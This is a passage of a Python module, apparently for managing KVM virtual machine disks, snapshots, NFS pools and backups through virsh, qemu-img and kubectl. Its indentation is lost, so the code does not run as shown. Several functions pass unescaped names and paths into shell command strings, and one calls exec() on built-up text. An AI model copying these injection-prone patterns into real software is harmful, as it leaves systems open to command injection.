result["pool"] = pool
result["free"] = result['available']
result["poolname"] = poolname
result["uuid"] = poolname
result["url"] = url
if is_pool_started(poolname):
result["state"] = "active"
else:
result["state"] = "inactive"
return result
def write_config(vol, dir, current, pool, poolname):
config = {}
config['name'] = vol
config['dir'] = dir
config['current'] = current
config['pool'] = pool
config['poolname'] = poolname
with open('%s/config.json' % dir, "w") as f:
logger.debug(config)
dump(config, f)
def get_disk_info_to_k8s(poolname, vol):
config_path = '%s/%s/config.json' % (get_pool_info(poolname)['path'], vol)
if not os.path.exists(config_path):
return get_vol_info_from_k8s(vol)
with open(config_path, "r") as f:
config = load(f)
result = get_disk_info(config['current'])
result['disk'] = vol
result["pool"] = config['pool']
result["poolname"] = poolname
result["uni"] = config['current']
result["current"] = config['current']
return result
def get_remote_node_all_nic_ip(remote):
ips = []
try:
output = remoteRunCmdWithOutput(remote, 'ip address | grep inet')
for line in output.splitlines():
if len(line.split()) > 1:
ip = line.split()[1].split('/')[0]
ips.append(ip)
except:
logger.debug(traceback.format_exc())
return ips
def get_snapshot_info_to_k8s(poolname, vol, name):
config_path = '%s/%s/config.json' % (get_pool_info(poolname)['path'], vol)
if not os.path.exists(config_path):
return get_snapshot_info_from_k8s(name)
with open(config_path, "r") as f:
config = load(f)
ss_path = '%s/snapshots/%s' % (config['dir'], name)
result = get_disk_info(ss_path)
result['disk'] = vol
result["pool"] = config['pool']
result["poolname"] = poolname
result["uni"] = config['current']
result['snapshot'] = name
return result
def get_sn_chain(ss_path):
try:
result = runCmdWithResult('qemu-img info -U --backing-chain --output json %s' % ss_path)
except:
try:
result = runCmdWithResult('qemu-img info --backing-chain --output json %s' % ss_path)
except:
logger.debug(traceback.format_exc())
error_print(400, "can't get snapshot info in qemu-img.")
exit(1)
return result
def get_sn_chain_path(ss_path):
paths = set()
chain = get_sn_chain(ss_path)
for info in chain:
if 'backing-filename' in list(info.keys()):
paths.add(info['backing-filename'])
return list(paths)
def get_all_snapshot_to_delete(ss_path, current):
delete_sn = []
chain = get_sn_chain(current)
for info in chain:
if 'backing-filename' in list(info.keys()) and info['backing-filename'] == ss_path:
delete_sn.append(info['filename'])
delete_sn.extend(get_all_snapshot_to_delete(info['filename'], current))
break
return delete_sn
class DiskImageHelper(object):
@staticmethod
def get_backing_file(file, raise_it=False):
""" Gets backing file for disk image """
get_backing_file_cmd = "qemu-img info %s" % file
try:
out = runCmdRaiseException(get_backing_file_cmd, use_read=True)
except Exception as e:
if raise_it:
raise e
get_backing_file_cmd = "qemu-img info -U %s" % file
out = runCmdRaiseException(get_backing_file_cmd, use_read=True)
lines = out.decode('utf-8').split('\n')
for line in lines:
if re.search("backing file:", line):
return str(line.strip().split()[2])
return None
@staticmethod
def get_backing_files_tree(file):
""" Gets all backing files (snapshot tree) for disk image """
backing_files = []
backing_file = DiskImageHelper.get_backing_file(file)
while backing_file is not None:
backing_files.append(backing_file)
backing_file = DiskImageHelper.get_backing_file(backing_file)
return backing_files
@staticmethod
def set_backing_file(backing_file, file):
""" Sets backing file for disk image """
set_backing_file_cmd = "qemu-img rebase -u -b %s %s" % (backing_file, file)
runCmdRaiseException(set_backing_file_cmd)
def check_disk_in_use(disk_path):
try:
result = runCmdWithResult('qemu-img info --output json %s' % disk_path)
except:
return True
return False
def delete_vm_disk_in_xml(xmlfile, disk_file):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") == disk_file:
caption.remove(disk)
tree.write(xmlfile)
return True
return False
def delete_vm_cdrom_file_in_xml(xmlfile):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'cdrom' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
disk.remove(source_element)
tree.write(xmlfile)
return True
return False
def modofy_vm_disk_file(xmlfile, source, target):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") == source:
source_element.set("file", target)
tree.write(xmlfile)
return True
return False
def attach_vm_disk(vm, disk):
time = 4
for t in range(time):
try:
disk_specs = get_disks_spec(vm)
if not os.path.exists(disk):
raise ExecuteException('', 'disk file %s not exist.' % disk)
if disk in list(disk_specs.keys()):
raise ExecuteException('', 'disk file %s has attached in vm %s.' % (disk, vm))
tag = None
letter_list = list(string.ascii_lowercase)
for i in letter_list:
if ('vd' + i) not in list(disk_specs.values()):
tag = 'vd' + i
break
disk_info = get_disk_info(disk)
if is_vm_active(vm):
runCmd('virsh attach-disk --domain %s --cache none --live --config %s --target %s --subdriver %s' % (
vm, disk, tag, disk_info['format']))
else:
runCmd('virsh attach-disk --domain %s --cache none --config %s --target %s --subdriver %s' % (
vm, disk, tag, disk_info['format']))
return
except Exception:
logger.debug(traceback.format_exc())
pass
raise ExecuteException('RunCmdError', 'can not attach disk %s to vm %s' % (disk, vm))
def modofy_vm_disks(vm, source_to_target):
if not vm or not source_to_target:
raise ExecuteException('', 'missing parameter: no vm name(%s) or source_to_target.' % vm)
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") in list(source_to_target.keys()):
source_element.set("file", source_to_target[source_element.get("file")])
tree.write('/tmp/%s.xml' % vm)
runCmd('virsh define /tmp/%s.xml' % vm)
runCmd('rm /tmp/%s.xml' % vm)
return True
return False
def define_and_restore_vm_disks(xmlfile, newname, source_to_target):
logger.debug(xmlfile)
logger.debug(source_to_target)
if not xmlfile or not source_to_target:
raise ExecuteException('', 'missing parameter: no vm xml file %s or source_to_target.' % xmlfile)
uuid = randomUUID().replace('-', '')
vm_file = '/tmp/%s.xml' % uuid
runCmd('cp %s %s' % (xmlfile, vm_file))
tree = ET.parse(vm_file)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
nameList = root.findall("name")
for name in nameList:
name.text = newname
uuidList = root.findall("uuid")
for uuid in uuidList:
uuid.text = randomUUID()
captionList = root.findall("devices")
for caption in captionList:
interfaces = caption.findall("interface")
for interface in interfaces:
caption.remove(interface)
disks = caption.findall("disk")
disk_need_to_delete = []
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") in list(source_to_target.keys()):
source_element.set("file", source_to_target[source_element.get("file")])
else:
disk_need_to_delete.append(disk)
for disk in disk_need_to_delete:
caption.remove(disk)
tree.write(vm_file)
runCmd('virsh define %s' % vm_file)
runCmd('rm %s' % vm_file)
try:
helper = K8sHelper('VirtualMachine')
vm_xml = get_vm_xml(newname)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
helper.create(newname, 'domain', vm_json)
except:
pass
def try_fix_disk_metadata(path):
if os.path.basename(os.path.dirname(path)) == 'snapshots':
disk = os.path.basename(os.path.dirname(os.path.dirname(path)))
disk_dir = os.path.dirname(os.path.dirname(path))
else:
disk = os.path.basename(os.path.dirname(path))
disk_dir = os.path.dirname(path)
vol_info = get_vol_info_from_k8s(disk)
pool_info = get_pool_info_from_k8s(vol_info['pool'])
try:
config_file = '%s/config.json' % disk_dir
logger.debug("config_file: %s" % config_file)
if not os.path.exists(config_file):
RETRY_TIMES = 4
for i in range(RETRY_TIMES):
try:
pool_active(pool_info['pool'])
break
except ExecuteException as e:
if i < RETRY_TIMES - 1:
pass
else:
error_print(101, "pool %s can not be active" % pool_info['pool'])
config = get_disk_config_by_path(config_file)
domains = get_all_domain()
for domain in domains:
try:
disk_specs = get_disks_spec(domain)
for disk_path in list(disk_specs.keys()):
if os.path.basename(os.path.dirname(disk_path)) == disk or os.path.basename(
os.path.dirname(os.path.dirname(disk_path))) == disk:
if config['current'] != disk_path or vol_info['current'] != disk_path:
logger.debug('try_fix_disk_metadata')
logger.debug('domain %s current: %s' % (domain, disk_path))
write_config(disk, disk_dir, disk_path, config['pool'], config['poolname'])
modifyDiskAndSs(config['pool'], disk)
return disk_path
except:
pass
# not attach to vm, just try to fix disk
# lists = []
# for df in os.listdir(disk_dir):
# if df == 'config.json':
# continue
# lists.append('%s/%s' % (disk_dir, df))
# ss_dir = '%s/snapshots' % disk_dir
# if os.path.exists(ss_dir):
# for df in os.listdir(ss_dir):
# if df == 'config.json':
# continue
# lists.append('%s/%s' % (ss_dir, df))
# lists.sort(key=lambda x: os.path.getmtime(x))
# file_new = lists[-1]
# disk_info = get_disk_info(file_new)
# if config['current'] != file_new or vol_info['current'] != file_new:
# logger.debug('try_fix_disk_metadata')
# logger.debug('current: %s' % file_new)
# write_config(disk, disk_dir, file_new, config['pool'], config['poolname'])
# modify_disk_info_in_k8s(config['poolname'], disk)
# return file_new
except:
logger.debug(traceback.format_exc())
return None
def change_vm_os_disk_file(vm, source, target):
if not vm or not source or not target:
raise ExecuteException('', 'missing parameter: no vm name(%s) or source path(%s) or target path(%s).' % (
vm, source, target))
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") == source:
source_element.set("file", target)
tree.write('/tmp/%s.xml' % vm)
runCmd('virsh define /tmp/%s.xml' % vm)
return True
return False
def is_shared_storage(path):
if not path:
raise ExecuteException('', 'missing parameter: no path.')
cmd = 'df %s | awk \'{print $1}\' | sed -n "2, 1p"' % path
fs = runCmdAndGetOutput(cmd)
if fs:
fs = fs.strip()
if re.match('^((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}:.*$', fs):
return True
return False
def get_vm_disks_from_xml(xmlfile):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
all_disks = []
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
disk_file = source_element.get("file")
if not is_shared_storage(disk_file):
all_disks.append(disk_file)
return all_disks
def is_vm_disk_not_shared_storage(vm):
if not vm:
raise ExecuteException('', 'missing parameter: no vm name.')
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
disk_file = source_element.get("file")
if not is_shared_storage(disk_file):
return False
return True
def is_vm_disk_driver_cache_none(vm):
if not vm:
raise ExecuteException('', 'missing parameter: no vm name.')
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("driver")
if "cache" in list(source_element.keys()) and source_element.get("cache") == "none":
continue
else:
return False
return True
def remote_start_pool(ip, pool):
pool_info = get_pool_info_from_k8s(pool)
remoteRunCmd(ip, 'kubesds-adm startPool --type %s --pool %s' % (pool_info['pooltype'], pool))
def auto_mount(pool):
pool_info = get_pool_info_from_k8s(pool)
proto = pool_info['pooltype']
# opt = pool_info['url']
opt = ''
MOUNT_PATH = os.path.dirname(pool_info['path'])
if not os.path.exists(MOUNT_PATH):
os.makedirs(MOUNT_PATH)
if pool_info['pooltype'] == 'nfs' and 'url' in pool_info.keys():
url = pool_info['url']
output = runCmdAndGetOutput('df %s' % MOUNT_PATH)
for line in output.splitlines():
if line.find(url) >= 0:
return
runCmd(
'timeout --preserve-status --foreground 5 mount -t %s -o %s %s %s >/dev/null' % (
proto, opt, url, MOUNT_PATH))
def mount_storage(pooltype, opt, url, path):
if pooltype == 'nfs':
runCmd(
'timeout --preserve-status --foreground 5 mount -t %s -o %s %s %s >/dev/null' % (pooltype, opt, url, path))
def umount_storage(pool):
pool_info = get_pool_info_from_k8s(pool)
proto = pool_info['pooltype']
path = pool_info['path']
MOUNT_PATH = os.path.dirname(pool_info['path'])
if proto == 'nfs' and 'url' in pool_info.keys():
url = pool_info['url']
output = runCmdAndGetOutput('df %s' % MOUNT_PATH)
for line in output.splitlines():
if line.find(url) >= 0:
runCmd('timeout --preserve-status --foreground 5 umount -f %s >/dev/null' % MOUNT_PATH)
def pool_active(pool):
auto_mount(pool)
def get_pool_all_disk(poolname):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.spec.volume.poolname==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\n\\"}{end}"' % poolname)
break
except Exception:
logger.debug(traceback.format_exc())
disks = []
if output:
for line in output.splitlines():
disk = {}
if len(line.split()) < 2:
continue
disk['disk'] = line.split()[0]
disk['host'] = line.split()[1]
disks.append(disk)
return disks
def get_pool_all_ss(poolname):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmdsn -o=jsonpath="{range .items[?(@.spec.volume.poolname==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\n\\"}{end}"' % poolname)
break
except Exception:
logger.debug(traceback.format_exc())
disks = []
if output:
for line in output.splitlines():
disk = {}
if len(line.split()) < 2:
continue
disk['ss'] = line.split()[0]
disk['host'] = line.split()[1]
disks.append(disk)
return disks
def get_pools_by_node(node_name):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmp -o=jsonpath="{range .items[?(.metadata.labels.host==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.spec.pool.poolname}{\\"\\t\\"}{.metadata.labels.host}{\\"\\n\\"}{end}"' % node_name)
break
except Exception:
logger.debug(traceback.format_exc())
pools = []
if output:
for line in output.splitlines():
pool = {}
if len(line.split()) < 3:
continue
pool['pool'] = line.split()[0]
pool['poolname'] = line.split()[1]
pools.append(pool)
return pools
def get_pools_by_path(path):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmp -o=jsonpath="{range .items[?(@.spec.pool.path==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\t\\"}{.spec.pool.path}{\\"\\n\\"}{end}"' % path)
break
except Exception:
logger.debug(traceback.format_exc())
pools = []
if output:
for line in output.splitlines():
pool = {}
if len(line.split()) < 3:
continue
pool['pool'] = line.split()[0]
pool['host'] = line.split()[1]
pools.append(pool)
return pools
def get_pools_by_poolname(poolname):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmp -o=jsonpath="{range .items[?(@.spec.pool.poolname==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\t\\"}{.spec.pool.path}{\\"\\n\\"}{end}"' % poolname)
break
except Exception:
logger.debug(traceback.format_exc())
pools = []
if output:
for line in output.splitlines():
pool = {}
if len(line.split()) < 3:
continue
pool['pool'] = line.split()[0]
pool['host'] = line.split()[1]
pools.append(pool)
return pools
def get_all_node_ip():
all_node_ip = []
try:
jsondict = client.CoreV1Api().list_node().to_dict()
nodes = jsondict['items']
for node in nodes:
try:
node_ip = {}
node_ip['ip'] = node['metadata']['annotations']['THISIP']
node_ip['nodeName'] = node['metadata']['name']
all_node_ip.append(node_ip)
except:
logger.debug(traceback.format_exc())
except ApiException as e:
logger.debug("Exception when calling CoreV1Api->list_node: %s\n" % e)
except Exception as e:
logger.debug("Exception when calling get_all_node_ip: %s\n" % e)
return all_node_ip
def get_spec(jsondict):
spec = jsondict.get('spec')
if not spec:
raw_object = jsondict.get('raw_object')
if raw_object:
spec = raw_object.get('spec')
return spec
# get disk and snapshot jsondict and change to targetPool
# def get_migrate_disk_jsondict(disk, targetPool):
# jsondicts = []
# # two case: 1. pool has same path 2. pool has different path
# pool_helper = K8sHelper('VirtualMachinePool')
# pool_metadata = pool_helper.get(targetPool)['metadata']
# pool_info = pool_helper.get_data(targetPool, 'pool')
#
# # get disk jsondict
# disk_helper = K8sHelper('VirtualMachineDisk')
# disk_info = disk_helper.get_data(disk, 'volume')
# disk_jsondict = disk_helper.get(disk)
# if disk_info['poolname'] == pool_info['poolname']: # same poolname
# if disk_jsondict:
# disk_jsondict['metadata']['labels']['host'] = pool_metadata['labels']['host']
# spec = get_spec(disk_jsondict)
# if spec:
# nodeName = spec.get('nodeName')
# if nodeName:
# spec['nodeName'] = pool_metadata['labels']['host']
# disk_info['pool'] = targetPool
# disk_info["poolname"] = pool_info['poolname']
# spec['volume'] = disk_info
# jsondicts.append(disk_jsondict)
# ss_helper = K8sHelper('VirtualMachineDiskSnapshot')
# ss_dir = '%s/%s/snapshots' % (pool_info['path'], disk)
# for ss in os.listdir(ss_dir):
# try:
# ss_jsondict = ss_helper.get(ss)
# if ss_jsondict:
# ss_jsondict['metadata']['labels']['host'] = pool_metadata['labels']['host']
# spec = get_spec(ss_jsondict)
# if spec:
# nodeName = spec.get('nodeName')
# if nodeName:
# spec['nodeName'] = pool_metadata['labels']['host']
# disk_info['pool'] = targetPool
# disk_info["poolname"] = pool_info['poolname']
# spec['volume'] = disk_info
# jsondicts.append(ss_jsondict)
# except ExecuteException:
# pass
#
# else: #different poolname
# pass
#
#
# return jsondicts
def get_disk_jsondict(pool, disk):
jsondicts = []
pool_helper = K8sHelper('VirtualMachinePool')
pool_jsondict = pool_helper.get(pool)
pool_node_name = pool_jsondict['metadata']['labels']['host']
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
# get disk jsondict
disk_helper = K8sHelper('VirtualMachineDisk')
# if pool_info['pooltype'] not in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]:
# raise ExecuteException("RunCmdError", "not support pool type %s" % pool_info['pooltype'])
if disk_helper.exist(disk): # migrate disk or migrate vm
disk_jsondict = disk_helper.get(disk)
# update disk jsondict
disk_jsondict['metadata']['labels']['host'] = pool_node_name
spec = get_spec(disk_jsondict)
logger.debug(disk_jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = pool_node_name
# disk_dir = '%s/%s' % (pool_info['path'], disk)
# config = get_disk_config(pool, disk)
# write_config(disk, disk_dir, config['current'], pool, config['poolname'])
disk_info = get_disk_info_to_k8s(pool_info['poolname'], disk)
spec['volume'] = disk_info
logger.debug(disk_jsondict)
jsondicts.append(disk_jsondict)
# update snapshot jsondict
ss_helper = K8sHelper('VirtualMachineDiskSnapshot')
ss_dir = '%s/%s/snapshots' % (pool_info['path'], disk)
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
try:
ss_jsondict = ss_helper.get(ss)
if ss_jsondict and ss_helper.get_data(ss, 'volume')['disk'] == disk:
ss_jsondict['metadata']['labels']['host'] = pool_node_name
spec = get_spec(ss_jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = pool_node_name
ss_info = get_snapshot_info_to_k8s(pool_info['poolname'], disk, ss)
spec['volume'] = ss_info
jsondicts.append(ss_jsondict)
except ExecuteException:
pass
else: # clone disk
disk_info = get_disk_info_to_k8s(pool_info['poolname'], disk)
disk_jsondict = disk_helper.get_create_jsondict(disk, 'volume', disk_info)
jsondicts.append(disk_jsondict)
# ss_helper = K8sHelper('VirtualMachineDiskSnapshot')
# ss_dir = '%s/%s/snapshots' % (pool_info['path'], disk)
# for ss in os.listdir(ss_dir):
# try:
# ss_info = get_snapshot_info_to_k8s(pool_info['poolname'], disk, ss)
# ss_jsondict = ss_helper.get_create_jsondict(ss)
#
# jsondicts.append(ss_jsondict)
# except ExecuteException:
# pass
return jsondicts
def modifyDiskAndSs(pool, disk):
# get disk node label in ip
node_name = get_hostname_in_lower_case()
# node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
pool_info = get_pool_info_from_k8s(pool)
pools = get_pools_by_path(pool_info['path'])
logger.debug("pools: %s" % dumps(pools))
logger.debug("node_name: %s" % node_name)
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
if targetPool:
all_jsondicts = get_disk_jsondict(targetPool, disk)
apply_all_jsondict(all_jsondicts)
def rebase_snapshot_with_config(pool, vol):
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
old_disk_info = get_vol_info_from_k8s(vol)
old_pool_info = get_pool_info_from_k8s(old_disk_info['pool'])
check_pool_active(old_pool_info)
old_disk_dir = '%s/%s' % (old_pool_info['path'], vol)
disk_dir = '%s/%s' % (pool_info['path'], vol)
# change config
old_config = get_disk_config(pool_info['poolname'], vol)
current = old_config['current'].replace(old_pool_info['path'], pool_info['path'])
write_config(vol, disk_dir, current, pool, pool_info['poolname'])
# change backing file
logger.debug('disk_dir: %s' % disk_dir)
for ss in os.listdir(disk_dir):
if ss == 'snapshots' or ss == 'config.json':
continue
ss_info = None
ss_full_path = '%s/%s' % (disk_dir, ss)
try:
ss_info = get_disk_info(ss_full_path)
except ExecuteException:
pass
if ss_info:
if 'backing_filename' in list(ss_info.keys()):
old_backing_file = ss_info['backing_filename']
new_backing_file = old_backing_file.replace(old_disk_dir, disk_dir)
logger.debug('old backing file %s, new backing file %s' % (old_backing_file, new_backing_file))
if os.path.exists(new_backing_file):
runCmd('qemu-img rebase -b %s %s' % (new_backing_file, ss_full_path))
ss_dir = '%s/snapshots' % disk_dir
logger.debug('ss_dir: %s' % ss_dir)
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
ss_info = None
ss_full_path = '%s/%s' % (ss_dir, ss)
try:
ss_info = get_disk_info(ss_full_path)
except ExecuteException:
pass
if ss_info:
if 'backing_filename' in list(ss_info.keys()):
old_backing_file = ss_info['backing_filename']
new_backing_file = old_backing_file.replace(old_disk_dir, disk_dir)
logger.debug('old backing file %s, new backing file %s' % (old_backing_file, new_backing_file))
if os.path.exists(new_backing_file):
runCmd('qemu-img rebase -u -b %s %s' % (new_backing_file, ss_full_path))
jsondicts = get_disk_jsondict(pool, vol)
apply_all_jsondict(jsondicts)
def apply_all_jsondict(jsondicts):
if len(jsondicts) == 0:
return
logger.debug(jsondicts)
filename = randomUUID()
logger.debug(filename)
for i in range(30):
with open('/tmp/%s.yaml' % filename, 'w') as f:
for i in range(len(jsondicts)):
current_jsondict = replaceData(jsondicts[i])
result = yaml.safe_dump(current_jsondict)
f.write(result)
if i != len(jsondicts) - 1:
f.write('---\n')
try:
logger.debug("jsondicts: /tmp/%s.yaml" % filename)
runCmd('kubectl apply -f /tmp/%s.yaml' % filename)
# try:
# runCmd('rm -f /tmp/%s.yaml' % filename)
# except ExecuteException:
# pass
return
except ExecuteException as e:
logger.debug(e.message)
if e.message.find('Warning') >= 0 or e.message.find(
'failed to open a connection to the hypervisor software') >= 0:
pass
raise ExecuteException('RunCmdError', 'can not apply jsondict %s on k8s.' % dumps(jsondicts))
def create_all_jsondict(jsondicts):
if len(jsondicts) == 0:
return
filename = randomUUID()
logger.debug(filename)
with open('/tmp/%s.yaml' % filename, 'w') as f:
for i in range(len(jsondicts)):
result = yaml.safe_dump(jsondicts[i])
f.write(result)
if i != len(jsondicts) - 1:
f.write('---\n')
for i in range(30):
try:
runCmd('kubectl create -f /tmp/%s.yaml' % filename)
# if result['result'] != 0:
# raise ExecuteException('RunCmdError', result['result']['msg'])
try:
runCmd('rm -f /tmp/%s.yaml' % filename)
except ExecuteException:
pass
return
except ExecuteException as e:
logger.debug(e.message)
if e.message.find('Warning') >= 0 or e.message.find(
'failed to open a connection to the hypervisor software') >= 0:
pass
raise ExecuteException('RunCmdError', 'can not apply jsondict %s on k8s.' % dumps(jsondicts))
def get_node_ip_by_node_name(nodeName):
all_node_ip = get_all_node_ip()
if all_node_ip:
for ip in all_node_ip:
if ip['nodeName'] == nodeName:
return ip['ip']
return None
def get_node_name_by_node_ip(ip):
all_node_ip = get_all_node_ip()
nic_ips = get_remote_node_all_nic_ip(ip)
if all_node_ip:
for node in all_node_ip:
if node['ip'] in nic_ips and node['nodeName'].find("vm.") >= 0:
return node['nodeName']
return None
def get_vm_xml(domain):
return runCmdAndGetOutput('virsh dumpxml %s' % domain)
def xmlToJson(xmlStr):
return dumps(bf.data(fromstring(xmlStr)), sort_keys=True, indent=4)
def toKubeJson(json):
return json.replace('@', '_').replace('$', 'text').replace(
'interface', '_interface').replace('transient', '_transient').replace(
'nested-hv', 'nested_hv').replace('suspend-to-mem', 'suspend_to_mem').replace('suspend-to-disk',
'suspend_to_disk')
def _addListToSpecificField(data):
if isinstance(data, list):
return data
else:
return [data]
'''
Cautions! Do not modify this function because it uses reflections!
'''
def _userDefinedOperationInList(field, jsondict, alist):
jsondict = jsondict[field]
tmp = jsondict
do_it = False
for index, value in enumerate(alist):
if index == 0:
if value != field:
break
continue
tmp = tmp.get(value)
if not tmp:
do_it = False
break
do_it = True
if do_it:
tmp2 = None
for index, value in enumerate(alist):
if index == 0:
tmp2 = 'jsondict'
else:
tmp2 = '{}[\'{}\']'.format(tmp2, value)
exec(('{} = {}').format(tmp2, _addListToSpecificField(tmp)))
return
def updateDomain(jsondict):
for line in vmArray:
alist = line.split('-')
_userDefinedOperationInList('domain', jsondict, alist)
return jsondict
def modifyVMOnNode(domain):
helper = K8sHelper('VirtualMachine')
try:
jsonDict = helper.get(domain)
vm_xml = get_vm_xml(domain)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
vm_json = updateJsonRemoveLifecycle(jsonDict, vm_json)
jsonDict = addPowerStatusMessage(vm_json, 'Running', 'The VM is running.')
helper.updateAll(domain, jsonDict)
except:
pass
# def checkVMDiskFileChanged():
# p = subprocess.Popen('virt-diff ', shell=True, stdout=subprocess.PIPE)
# try:
# while True:
# output = p.stdout.readline()
# if output == '' and p.poll() is not None:
# break
# if output:
# # print output.strip()
# p.terminate()
# except Exception:
# traceback.print_exc()
# finally:
# p.stdout.close()
def checksum(path, block_size=8192):
with open(path, "rb") as f:
file_hash = hashlib.md5()
while True:
data = f.read(block_size)
if not data:
break
file_hash.update(data)
return file_hash.hexdigest()
def get_disk_backup_current(domain, pool, disk):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
history_file_path = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file_path):
raise ExecuteException('', 'can not find disk %s current full backup version in %s' % (
disk, history_file_path))
with open(history_file_path, 'r') as f:
history = load(f)
if 'current' not in list(history.keys()):
raise ExecuteException('', 'disk %s backup version not exist current full backup version. plz check %s' % (
disk, history_file_path))
if history['current'] in list(history.keys()):
return history['current']
else:
disk_versions = get_disk_backup_full_version(domain, pool, disk)
if len(disk_versions) == 0:
raise ExecuteException('',
'disk %s backup version not exist full backup version. plz check %s' % (
disk, history_file_path))
time = 0.0
newestV = None
for fv in disk_versions:
for v in list(history[fv].keys()):
if history[fv][v]['time'] > time:
time = history[fv][v]['time']
newestV = fv
if newestV is None:
raise ExecuteException('',
'disk %s backup version not exist full backup version. plz check %s' % (
disk, history_file_path))
else:
return newestV
def is_disk_backup_exist(domain, pool, disk, version):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file):
return False
with open(history_file, 'r') as f:
history = load(f)
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return True
return False
def is_vm_backup_exist(domain, pool, version):
pool_info = get_pool_info_from_k8s(pool)
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], domain)
history_file_path = '%s/history.json' % backup_dir
if not os.path.exists(history_file_path):
return False
with open(history_file_path, 'r') as f:
history = load(f)
if version in list(history.keys()):
return True
return False
def is_remote_vm_backup_exist(domain, version, remote, port, username, password):
target_dir = '/vmbackup/%s' % domain
ftp = FtpHelper(remote, port, username, password)
history_file = '%s/history.json' % target_dir
if ftp.is_exist_dir(target_dir) and ftp.is_exist_file(history_file):
history = ftp.get_json_file_data(history_file)
if history and version in list(history.keys()):
return True
return False
def get_full_version(domain, pool, disk, version):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file):
raise ExecuteException('', 'not exist history file %s' % history_file)
with open(history_file, 'r') as f:
history = load(f)
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return full_version
raise ExecuteException('', 'not exist disk %s full backup version in history file %s.' % (disk, history_file))
def get_full_version_by_history(disk, version, history):
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return full_version
raise ExecuteException('', 'not exist disk %s backup version %s in history %s.' % (disk, version, dumps(history)))
